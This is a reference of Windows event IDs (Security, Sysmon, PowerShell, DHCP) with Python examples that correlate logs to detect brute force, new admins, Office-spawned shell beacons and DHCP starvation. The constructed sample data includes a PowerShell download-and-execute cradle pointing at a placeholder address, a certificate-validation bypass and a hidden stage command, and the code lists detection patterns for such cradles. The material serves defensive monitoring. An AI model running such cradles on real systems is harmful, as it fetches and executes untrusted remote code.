Windows Event IDs reference
This reference lists common Windows Event IDs collected by AgentX with their descriptions.
Context
An Event ID identifies one kind of event within the log (channel) and provider that wrote it. The number alone is not unique across logs: Security event 1102, Sysmon event 1 and DHCP event 10 come from different sources, so filter on the log or provider name together with the ID. Use this reference to understand event meanings when creating Eventlog Collection filters or investigating security events.
Windows Security Auditing Event IDs
1100
The event logging service has shut down
1102
The audit log was cleared
4608
Windows is starting up
4609
Windows is shutting down
4616
The system time was changed
4624
An account was successfully logged on
4625
An account failed to log on
4634
An account was logged off
4647
User initiated logoff
4648
A logon was attempted using explicit credentials
4656
A handle to an object was requested
4657
A registry value was modified
4660
An object was deleted
4663
An attempt was made to access an object
4672
Special privileges assigned to new logon
4673
A privileged service was called
4688
A new process has been created
4689
A process has exited
4697
A service was installed in the system
4698
A scheduled task was created
4699
A scheduled task was deleted
4700
A scheduled task was enabled
4701
A scheduled task was disabled
4702
A scheduled task was updated
4719
System audit policy was changed
4720
A user account was created
4722
A user account was enabled
4723
An attempt was made to change an account's password
4724
An attempt was made to reset an account's password
4725
A user account was disabled
4726
A user account was deleted
4732
A member was added to a security-enabled local group
4733
A member was removed from a security-enabled local group
4738
A user account was changed
4740
A user account was locked out
4767
A user account was unlocked
4768
A Kerberos authentication ticket (TGT) was requested
4769
A Kerberos service ticket was requested
4771
Kerberos pre-authentication failed
4776
The domain controller attempted to validate the credentials for an account
4778
A session was reconnected to a Window Station
4779
A session was disconnected from a Window Station
4798
A user's local group membership was enumerated
4800
The workstation was locked
4801
The workstation was unlocked
4825
A user was denied access to Remote Desktop
5140
A network share object was accessed
5145
A network share object was checked to see whether client can be granted desired access
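The IDs above are most useful in combination. The Python below is an added example, not part of AgentX or of this reference, that runs two correlation rules over constructed 4624/4625/4720/4732 records: a spray or brute force seen as repeated 4625 failures from one source address followed by a 4624 success, and a 4720 account creation followed within minutes by a 4732 addition to a local administrators group. The field names follow the events' EventData schema; the record layout, sample values and thresholds are assumptions.

```python
"""Two correlation rules run over constructed Windows Security events.

Added example; not AgentX code and not AgentX's record format. The field
names (TargetUserName, IpAddress, LogonType, TargetSid, MemberSid) are the
EventData names used by Security events 4624/4625/4720/4732; each record
below is a constructed (timestamp, event_id, EventData subset) tuple.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_EVENTS = [
    # Five network-logon (LogonType 3) failures from one address, one per
    # account (a spray), then a success for the last account tried.
    ("2024-05-15T09:00:01", 4625, {"TargetUserName": "alice", "IpAddress": "10.1.2.3", "LogonType": "3"}),
    ("2024-05-15T09:00:02", 4625, {"TargetUserName": "bob", "IpAddress": "10.1.2.3", "LogonType": "3"}),
    ("2024-05-15T09:00:03", 4625, {"TargetUserName": "carol", "IpAddress": "10.1.2.3", "LogonType": "3"}),
    ("2024-05-15T09:00:04", 4625, {"TargetUserName": "dave", "IpAddress": "10.1.2.3", "LogonType": "3"}),
    ("2024-05-15T09:00:05", 4625, {"TargetUserName": "svc_backup", "IpAddress": "10.1.2.3", "LogonType": "3"}),
    ("2024-05-15T09:00:09", 4624, {"TargetUserName": "svc_backup", "IpAddress": "10.1.2.3", "LogonType": "3"}),
    # One mistyped password at the console (LogonType 2) must not trip the rule.
    ("2024-05-15T09:05:00", 4625, {"TargetUserName": "erin", "IpAddress": "127.0.0.1", "LogonType": "2"}),
    ("2024-05-15T09:05:10", 4624, {"TargetUserName": "erin", "IpAddress": "127.0.0.1", "LogonType": "2"}),
    # Account created, then added to the local Administrators group 40 s later.
    ("2024-05-15T09:10:00", 4720, {"TargetUserName": "helpdesk2", "TargetSid": "S-1-5-21-1-2-3-1105"}),
    ("2024-05-15T09:10:40", 4732, {"TargetUserName": "Administrators", "MemberSid": "S-1-5-21-1-2-3-1105"}),
    # Group change for an account with no matching 4720 in the data: not paired.
    ("2024-05-15T09:12:00", 4732, {"TargetUserName": "Administrators", "MemberSid": "S-1-5-21-1-2-3-1001"}),
]


def _ts(s):
    return datetime.fromisoformat(s)


def detect_brute_force(events, min_failures=5, window=timedelta(minutes=5)):
    """Return (IpAddress, TargetUserName) for each 4624 that follows at least
    min_failures 4625 events from the same IpAddress within `window`.
    Failures are counted per source address, not per account, so a spray
    (one guess per account) is caught as well as a single-account brute force."""
    failures = defaultdict(list)   # IpAddress -> timestamps of 4625 events
    hits = []
    for ts, eid, data in sorted(events, key=lambda e: e[0]):
        t = _ts(ts)
        ip = data.get("IpAddress", "-")
        if eid == 4625:
            failures[ip].append(t)
        elif eid == 4624:
            recent = [f for f in failures[ip] if t - f <= window]
            if len(recent) >= min_failures:
                hits.append((ip, data["TargetUserName"]))
    return hits


def detect_new_admin(events, window=timedelta(minutes=10), groups=("Administrators",)):
    """Return names of accounts created (4720) and then added to one of
    `groups` (4732) within `window`. Pairing is on the account SID: 4732
    identifies the member by MemberSid, and the 4720 carries the same value
    as TargetSid."""
    created = {}   # TargetSid -> (timestamp, TargetUserName)
    hits = []
    for ts, eid, data in sorted(events, key=lambda e: e[0]):
        t = _ts(ts)
        if eid == 4720:
            created[data["TargetSid"]] = (t, data["TargetUserName"])
        elif eid == 4732 and data.get("TargetUserName") in groups:
            entry = created.get(data.get("MemberSid"))
            if entry and t - entry[0] <= window:
                hits.append(entry[1])
    return hits


if __name__ == "__main__":
    print("brute force / spray:", detect_brute_force(SAMPLE_EVENTS))
    print("new local admin:", detect_new_admin(SAMPLE_EVENTS))
```

The thresholds are deliberately conservative: a single failed console logon followed by a success never matches, while the five failures against five different accounts from one address do. Real data needs the window and count tuned to the environment, and 4625 events carry a Status/SubStatus field (not modelled here) that separates bad passwords from disabled or non-existent accounts.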
Windows Sysmon Event IDs
1
Process creation
2
File creation time changed
3
Network connection detected
4
Sysmon service state changed
5
Process terminated
6
Driver loaded
7
Image loaded (DLL)
8
CreateRemoteThread detected
9
RawAccessRead detected
10
Process accessed
11
File created
12
Registry object added or deleted
13
Registry value set
14
Registry object renamed
15
File stream created
16
Sysmon configuration state changed
17
Pipe created
18
Pipe connected
19
WMI event filter activity detected
20
WMI event consumer activity detected
21
WMI event consumer to filter activity detected
22
DNS query executed
23
File deleted (a copy of the file is archived)
24
Clipboard changed
25
Process tampering detected
26
File delete logged (no copy archived)
255
Error report
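Sysmon events are linked by ProcessGuid: event 1 records each process together with its ParentProcessGuid, and event 3 carries the ProcessGuid of the process that made the connection. The Python below is an added example, not Sysmon's or AgentX's code. It rebuilds the ancestry chain from constructed event 1 records and flags an event 3 outbound connection made by a shell that descends from an Office application; the GUID values, paths, addresses and the lists of Office and shell images are assumptions.

```python
"""Join Sysmon event 1 (process creation) to event 3 (network connection)
by ProcessGuid and flag outbound connections from a shell spawned under an
Office application. Added example, not Sysmon or AgentX code. Field names
(ProcessGuid, ParentProcessGuid, Image, CommandLine, Initiated,
DestinationIp, DestinationPort) are Sysmon's; all values are constructed.
"""
import ntpath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

SYSMON_EVENTS = [
    (1, {"ProcessGuid": "{G-EXPLORER}", "ParentProcessGuid": "{G-USERINIT}",
         "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"}),
    (1, {"ProcessGuid": "{G-WORD}", "ParentProcessGuid": "{G-EXPLORER}",
         "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
         "CommandLine": '"WINWORD.EXE" /n invoice.docm'}),
    (1, {"ProcessGuid": "{G-CMD}", "ParentProcessGuid": "{G-WORD}",
         "Image": r"C:\Windows\System32\cmd.exe",
         "CommandLine": "cmd.exe /c powershell.exe -w hidden -f stage.ps1"}),
    (1, {"ProcessGuid": "{G-PS}", "ParentProcessGuid": "{G-CMD}",
         "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "CommandLine": "powershell.exe -w hidden -f stage.ps1"}),
    (1, {"ProcessGuid": "{G-CHROME}", "ParentProcessGuid": "{G-EXPLORER}",
         "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
         "CommandLine": "chrome.exe"}),
    # Word fetching online content and a browser are normal; the PowerShell
    # grandchild of Word calling out is the pattern we want.
    (3, {"ProcessGuid": "{G-WORD}", "Initiated": "true",
         "DestinationIp": "198.51.100.20", "DestinationPort": "443"}),
    (3, {"ProcessGuid": "{G-CHROME}", "Initiated": "true",
         "DestinationIp": "198.51.100.5", "DestinationPort": "443"}),
    (3, {"ProcessGuid": "{G-PS}", "Initiated": "true",
         "DestinationIp": "203.0.113.10", "DestinationPort": "443"}),
    # A connection the process accepted rather than opened is skipped.
    (3, {"ProcessGuid": "{G-PS}", "Initiated": "false",
         "DestinationIp": "10.0.0.9", "DestinationPort": "49152"}),
]


def index_processes(events):
    """Map ProcessGuid -> EventData for every event 1."""
    return {d["ProcessGuid"]: d for eid, d in events if eid == 1}


def ancestry(guid, procs):
    """Image basenames from the process itself up to the last known ancestor."""
    chain, seen = [], set()
    while guid in procs and guid not in seen:
        seen.add(guid)
        chain.append(ntpath.basename(procs[guid]["Image"]).lower())
        guid = procs[guid]["ParentProcessGuid"]
    return chain


def detect_office_shell_beacon(events):
    """Return (image, DestinationIp, DestinationPort, chain) for each outbound
    event 3 whose process has an Office ancestor and a shell somewhere
    between that ancestor and itself (itself included)."""
    procs = index_processes(events)
    hits = []
    for eid, d in events:
        if eid != 3 or d.get("Initiated") != "true":
            continue
        chain = ancestry(d["ProcessGuid"], procs)
        office = [i for i, p in enumerate(chain) if p in OFFICE_APPS]
        if not office:
            continue
        if any(p in SHELLS for p in chain[:office[0]]):
            hits.append((chain[0], d["DestinationIp"], int(d["DestinationPort"]),
                         " <- ".join(chain)))
    return hits


if __name__ == "__main__":
    for hit in detect_office_shell_beacon(SYSMON_EVENTS):
        print(hit)
```

Walking ParentProcessGuid rather than ParentProcessId matters because process IDs are reused after exit; the GUID stays unique for the life of the log. The rule is silent on WINWORD.EXE's own connection because no shell sits between Word and the connecting process.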
Windows PowerShell Event IDs
400
Engine state changed to available
403
Engine state changed to stopped
600
Provider lifecycle event
4100
Error record
4103
Module logging (command execution)
4104
Script block logging
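Event 4104 is written to the Microsoft-Windows-PowerShell/Operational log, and a script block larger than the per-event limit is split into several 4104 events that share a ScriptBlockId and carry MessageNumber and MessageTotal. Searching individual events for strings such as IEX or DownloadString therefore misses a call that straddles two chunks. The Python below is an added example, not AgentX code: it reassembles constructed 4104 records (delivered out of order, with one block incomplete) and only then runs a few indicator patterns over the full text. The sample script contents and the pattern list are assumptions.

```python
"""Reassemble chunked PowerShell script block logs (event 4104) and scan
the whole text. Added example, not AgentX code. ScriptBlockId,
MessageNumber, MessageTotal and ScriptBlockText are the event's own
EventData field names; the records below are constructed.
"""
import re

SAMPLE_4104 = [
    # Block A arrives as chunks 2, 3, 1 (out of order); block C is missing chunk 2.
    {"ScriptBlockId": "A", "MessageNumber": "2", "MessageTotal": "3",
     "ScriptBlockText": "$c = New-Object Net.WebClient\n"},
    {"ScriptBlockId": "B", "MessageNumber": "1", "MessageTotal": "1",
     "ScriptBlockText": "Get-Process | Sort-Object CPU\n"},
    {"ScriptBlockId": "A", "MessageNumber": "3", "MessageTotal": "3",
     "ScriptBlockText": "IEX $c.DownloadString('http://203.0.113.10/s')\n"},
    {"ScriptBlockId": "A", "MessageNumber": "1", "MessageTotal": "3",
     "ScriptBlockText": "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n"},
    {"ScriptBlockId": "C", "MessageNumber": "1", "MessageTotal": "2",
     "ScriptBlockText": "function Get-Thing {\n"},
]

# Indicator patterns (assumed, illustrative): downloader cradles, encoded
# commands and TLS validation bypass.
SUSPICIOUS = [
    r"\bIEX\b|Invoke-Expression",
    r"DownloadString|DownloadFile",
    r"-EncodedCommand|-enc\b",
    r"ServerCertificateValidationCallback",
]


def reassemble(events):
    """Return {ScriptBlockId: (full_text or None, [missing chunk numbers])}.
    Chunks are keyed by MessageNumber (1-based) so delivery order is irrelevant."""
    chunks = {}
    for e in events:
        chunks.setdefault(e["ScriptBlockId"], {})[int(e["MessageNumber"])] = e
    out = {}
    for sbid, parts in chunks.items():
        total = int(next(iter(parts.values()))["MessageTotal"])
        missing = [n for n in range(1, total + 1) if n not in parts]
        text = None if missing else "".join(parts[n]["ScriptBlockText"] for n in range(1, total + 1))
        out[sbid] = (text, missing)
    return out


def triage(events):
    """Map ScriptBlockId -> matched SUSPICIOUS patterns for complete blocks.
    Incomplete blocks are left out; their missing chunks are reported by
    reassemble() so the collector gap can be chased rather than ignored."""
    findings = {}
    for sbid, (text, missing) in reassemble(events).items():
        if text is None:
            continue
        matched = [p for p in SUSPICIOUS if re.search(p, text, re.IGNORECASE)]
        if matched:
            findings[sbid] = matched
    return findings


if __name__ == "__main__":
    for sbid, (text, missing) in reassemble(SAMPLE_4104).items():
        print(sbid, "incomplete, missing chunks" if missing else "complete", missing)
    print(triage(SAMPLE_4104))
```

Block A matches three patterns once joined, block B matches none, and block C is reported as incomplete rather than scanned. A collector that drops or truncates chunks silently loses exactly the large, obfuscated scripts this log exists to capture, so the incomplete set is worth alerting on in its own right.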
DHCP Event IDs (IPv4)
10
A new IP address was leased to a client
11
A lease was renewed by a client
12
A lease was released by a client
13
An IP address was found to be in use on the network
14
A lease request could not be satisfied because the scope's address pool was exhausted
15
A lease was denied
16
A lease was deleted
17
A lease expired (DNS records not deleted)
18
A lease expired (DNS records deleted)
30
DNS update request sent
31
DNS update failed
32
DNS update successful
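These IDs are the first column of the DHCP server's audit log (DhcpSrvLog-*.log), a comma-separated file whose leading columns are ID, Date, Time, Description, IP Address, Host Name and MAC Address. The Python below is an added example, not AgentX code: it parses constructed lines in that layout and looks for a lease-starvation pattern (many distinct MAC addresses taking new leases, ID 10, shortly before the pool is reported exhausted, ID 14) and lists address conflicts (ID 13). The Description text, addresses, MACs and thresholds are constructed.

```python
"""Parse constructed lines in the column layout of the Windows DHCP server
audit log and flag lease starvation and address conflicts. Added example,
not AgentX code; only the first seven columns are used and every value,
including the Description text, is constructed.
"""
import csv
from datetime import datetime, timedelta
from io import StringIO

# Constructed: a column header, two ordinary leases, a burst of ten new
# leases in ten seconds to sequential MACs, then scope exhaustion and a conflict.
BURST = "".join(
    f"10,05/15/24,09:30:{i:02d},Assign,10.0.0.{50 + i},,0a1b2c0000{i:02x},\n"
    for i in range(10)
)
DHCP_LOG = (
    "ID,Date,Time,Description,IP Address,Host Name,MAC Address,User Name\n"
    "10,05/15/24,09:00:01,Assign,10.0.0.20,ws020.corp.example,001122330020,\n"
    "11,05/15/24,09:05:30,Renew,10.0.0.21,ws021.corp.example,001122330021,\n"
    + BURST +
    "14,05/15/24,09:30:15,Scope exhausted,10.0.0.0,,,\n"
    "13,05/15/24,09:45:00,Conflict,10.0.0.7,,,\n"
)


def parse_dhcp_log(text):
    """Return one dict per data row; the header and any non-numeric
    first-column line (the real file has descriptive preamble) are skipped."""
    records = []
    for row in csv.reader(StringIO(text)):
        if not row or not row[0].strip().isdigit():
            continue
        records.append({
            "id": int(row[0]),
            "ts": datetime.strptime(f"{row[1]} {row[2]}", "%m/%d/%y %H:%M:%S"),
            "description": row[3],
            "ip": row[4],
            "host": row[5],
            "mac": row[6].lower(),
        })
    return records


def detect_starvation(records, window=timedelta(minutes=2), min_macs=8):
    """For each pool-exhaustion event (14), count the distinct MACs that took
    a new lease (10) in the preceding window; report (timestamp, count) when
    the count reaches min_macs. Many fresh MACs right before exhaustion is
    the signature of a starvation tool rather than organic growth."""
    hits = []
    for r in records:
        if r["id"] != 14:
            continue
        macs = {x["mac"] for x in records
                if x["id"] == 10 and r["ts"] - window <= x["ts"] <= r["ts"]}
        if len(macs) >= min_macs:
            hits.append((r["ts"], len(macs)))
    return hits


def address_conflicts(records):
    """IP addresses the server found already in use on the network (13)."""
    return [r["ip"] for r in records if r["id"] == 13]


if __name__ == "__main__":
    recs = parse_dhcp_log(DHCP_LOG)
    print("starvation:", detect_starvation(recs))
    print("conflicts:", address_conflicts(recs))
```

Exhaustion on its own (ID 14) is just a capacity problem; it becomes a security signal when the leases that emptied the pool went to a flood of previously unseen MAC addresses, which is why the rule counts distinct MACs rather than events. Conflicts (ID 13) are worth reviewing alongside it, since a rogue DHCP server or a host with a static address inside the scope produces them.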
DNS Query Types
A
IPv4 address record
AAAA
IPv6 address record
CNAME
Canonical name (alias) record
MX
Mail exchange record
NS
Name server record
PTR
Pointer record (reverse lookup)
SOA
Start of authority record
SRV
Service locator record
TXT
Text record
For complete Event ID listings and detailed field mappings, see the AgentX vendor field mapping tables.